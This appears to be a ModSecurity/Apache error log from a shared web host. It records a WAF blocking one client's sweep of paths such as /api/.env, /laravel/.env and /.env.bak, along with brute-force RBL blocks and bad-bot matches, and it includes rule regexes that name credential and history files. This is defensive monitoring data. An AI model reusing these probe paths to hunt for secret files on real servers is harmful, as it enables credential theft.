[Tue May 26 13:53:57.737242 2026] [security2:error] [pid 560287:tid 560457] [client 106.192.248.115:55148] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYnZmX5s6sDS3wJVcjjwAAAKo"]
[Tue May 26 13:53:59.146793 2026] [security2:error] [pid 560287:tid 560538] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYnpmX5s6sDS3wJVcjpgAAAPY"]
[Tue May 26 13:53:59.532516 2026] [security2:error] [pid 555743:tid 555919] [client 46.8.222.237:37793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.222.8.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYn8jqAquC0YaxQjDBWwAAATg"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:53:59.532686 2026] [security2:error] [pid 555743:tid 555919] [client 46.8.222.237:37793] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYn8jqAquC0YaxQjDBWwAAATg"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:54:00.322387 2026] [security2:error] [pid 555743:tid 555983] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYn8jqAquC0YaxQjDBYAAAAXg"]
[Tue May 26 13:54:00.329638 2026] [cgid:error] [pid 560287:tid 560444] [client 185.92.25.108:26699] AH01265: stderr from /home2/svijakqj/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 13:54:02.812848 2026] [security2:error] [pid 560287:tid 560443] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYopmX5s6sDS3wJVcj7gAAAJ0"]
[Tue May 26 13:54:03.692146 2026] [security2:error] [pid 555743:tid 555920] [client 74.7.244.31:47026] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rabbanitradingcompany.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVYo8jqAquC0YaxQjDBjgABOTo"]
[Tue May 26 13:54:03.805606 2026] [security2:error] [pid 555743:tid 555951] [client 74.7.230.36:59086] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rabbanitradingcompany.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVYo8jqAquC0YaxQjDBkQABWHk"]
[Tue May 26 13:54:04.440149 2026] [security2:error] [pid 560287:tid 560520] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYpJmX5s6sDS3wJVckEAAAAOY"]
[Tue May 26 13:54:05.407459 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:42420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYpZmX5s6sDS3wJVckKQAAAKU"]
[Tue May 26 13:54:05.415248 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:42420] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYpZmX5s6sDS3wJVckKQAAAKU"]
[Tue May 26 13:54:06.630464 2026] [security2:error] [pid 560287:tid 560530] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYppmX5s6sDS3wJVckNgAAAPA"]
[Tue May 26 13:54:06.798046 2026] [security2:error] [pid 560287:tid 560545] [client 37.19.197.137:22599] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.backup"] [unique_id "ahVYppmX5s6sDS3wJVckQQAAAP0"]
[Tue May 26 13:54:06.798387 2026] [security2:error] [pid 560287:tid 560505] [client 37.19.197.137:51143] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/api/.env"] [unique_id "ahVYppmX5s6sDS3wJVckQgAAANc"]
[Tue May 26 13:54:06.820676 2026] [security2:error] [pid 560287:tid 560439] [client 37.19.197.137:3608] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/crm/.env"] [unique_id "ahVYppmX5s6sDS3wJVckRAAAAJo"]
[Tue May 26 13:54:06.820782 2026] [security2:error] [pid 560287:tid 560480] [client 37.19.197.137:1593] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/wordpress/.env"] [unique_id "ahVYppmX5s6sDS3wJVckQwAAAL8"]
[Tue May 26 13:54:06.829007 2026] [security2:error] [pid 560287:tid 560475] [client 37.19.197.137:19367] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.bak"] [unique_id "ahVYppmX5s6sDS3wJVckRQAAALs"]
[Tue May 26 13:54:06.835611 2026] [security2:error] [pid 560287:tid 560511] [client 37.19.197.137:40447] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/erp/.env"] [unique_id "ahVYppmX5s6sDS3wJVckRwAAAN0"]
[Tue May 26 13:54:06.844838 2026] [security2:error] [pid 560287:tid 560547] [client 37.19.197.137:45535] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/laravel/.env"] [unique_id "ahVYppmX5s6sDS3wJVckSQAAAP8"]
[Tue May 26 13:54:06.846168 2026] [security2:error] [pid 555743:tid 555941] [client 37.19.197.137:55756] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/config/.env"] [unique_id "ahVYpsjqAquC0YaxQjDBvAAAAU4"]
[Tue May 26 13:54:06.850124 2026] [security2:error] [pid 555743:tid 555891] [client 37.19.197.137:64723] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/app/.env"] [unique_id "ahVYpsjqAquC0YaxQjDBvgAAARw"]
[Tue May 26 13:54:06.860076 2026] [security2:error] [pid 555743:tid 555934] [client 37.19.197.137:7833] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/backend/.env"] [unique_id "ahVYpsjqAquC0YaxQjDBvwAAAUc"]
[Tue May 26 13:54:07.217534 2026] [security2:error] [pid 560287:tid 560472] [client 37.19.197.137:22936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/wordpress/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckVwAAALg"]
[Tue May 26 13:54:07.219370 2026] [security2:error] [pid 560287:tid 560508] [client 37.19.197.137:64520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/crm/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckVgAAANo"]
[Tue May 26 13:54:07.235680 2026] [security2:error] [pid 555743:tid 555994] [client 37.19.197.137:38241] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.bak"] [unique_id "ahVYp8jqAquC0YaxQjDBwgAAAYM"]
[Tue May 26 13:54:07.241731 2026] [security2:error] [pid 560287:tid 560544] [client 37.19.197.137:8567] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/erp/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckWwAAAPw"]
[Tue May 26 13:54:07.278300 2026] [security2:error] [pid 555743:tid 555925] [client 37.19.197.137:15018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/api/.env"] [unique_id "ahVYp8jqAquC0YaxQjDBwwAAAT4"]
[Tue May 26 13:54:07.293527 2026] [security2:error] [pid 560287:tid 560532] [client 37.19.197.137:13207] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/app/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckXAAAAPI"]
[Tue May 26 13:54:07.339728 2026] [security2:error] [pid 560287:tid 560478] [client 37.19.197.137:9615] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/config/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckXgAAAL4"]
[Tue May 26 13:54:07.390463 2026] [security2:error] [pid 560287:tid 560422] [client 37.19.197.137:46098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public_html/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckZQAAAIk"]
[Tue May 26 13:54:07.400042 2026] [security2:error] [pid 560287:tid 560510] [client 37.19.197.137:13987] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckZgAAANw"]
[Tue May 26 13:54:07.483670 2026] [security2:error] [pid 560287:tid 560445] [client 37.19.197.137:37947] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/www/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckbQAAAJ8"]
[Tue May 26 13:54:07.537289 2026] [security2:error] [pid 560287:tid 560526] [client 37.19.197.137:59342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/cms/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckbwAAAOw"]
[Tue May 26 13:54:07.791995 2026] [security2:error] [pid 560287:tid 560523] [client 37.19.197.137:64657] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public_html/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckdgAAAOk"]
[Tue May 26 13:54:07.849000 2026] [security2:error] [pid 555743:tid 555886] [client 37.19.197.137:62323] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/www/.env"] [unique_id "ahVYp8jqAquC0YaxQjDB0QAAARc"]
[Tue May 26 13:54:07.871163 2026] [security2:error] [pid 555743:tid 555899] [client 37.19.197.137:22082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/.env.backup"] [unique_id "ahVYp8jqAquC0YaxQjDB0gAAASQ"]
[Tue May 26 13:54:07.908619 2026] [security2:error] [pid 555743:tid 555976] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYp8jqAquC0YaxQjDByAAAAXE"]
[Tue May 26 13:54:07.962073 2026] [security2:error] [pid 560287:tid 560541] [client 37.19.197.137:32902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/cms/.env"] [unique_id "ahVYp5mX5s6sDS3wJVckfgAAAPk"]
[Tue May 26 13:54:08.169303 2026] [security2:error] [pid 555743:tid 555936] [client 37.19.197.137:43116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/backend/.env"] [unique_id "ahVYqMjqAquC0YaxQjDB3AAAAUk"]
[Tue May 26 13:54:08.170183 2026] [security2:error] [pid 560287:tid 560490] [client 37.19.197.137:45518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/public/.env"] [unique_id "ahVYqJmX5s6sDS3wJVckgAAAAMk"]
[Tue May 26 13:54:08.346455 2026] [security2:error] [pid 560287:tid 560446] [client 37.19.197.137:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.222.227.191"] [uri "/laravel/.env"] [unique_id "ahVYqJmX5s6sDS3wJVckhAAAAKA"]
[Tue May 26 13:54:09.786685 2026] [security2:error] [pid 555743:tid 555894] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYqcjqAquC0YaxQjDB9wAAAR8"]
[Tue May 26 13:54:09.971845 2026] [security2:error] [pid 560287:tid 560470] [client 106.192.248.115:55452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpgAAALY"]
[Tue May 26 13:54:09.971985 2026] [security2:error] [pid 560287:tid 560470] [client 106.192.248.115:55452] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpgAAALY"]
[Tue May 26 13:54:10.036879 2026] [security2:error] [pid 560287:tid 560509] [client 201.137.246.134:37195] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpAAAANs"]
[Tue May 26 13:54:10.129737 2026] [security2:error] [pid 560287:tid 560509] [client 201.137.246.134:37195] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahVYqZmX5s6sDS3wJVckpAAAANs"]
[Tue May 26 13:54:11.236800 2026] [security2:error] [pid 560287:tid 560481] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYqpmX5s6sDS3wJVcktgAAAMA"]
[Tue May 26 13:54:13.666739 2026] [security2:error] [pid 560287:tid 560529] [client 74.7.230.8:32798] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahVYrZmX5s6sDS3wJVck7QAAAO8"]
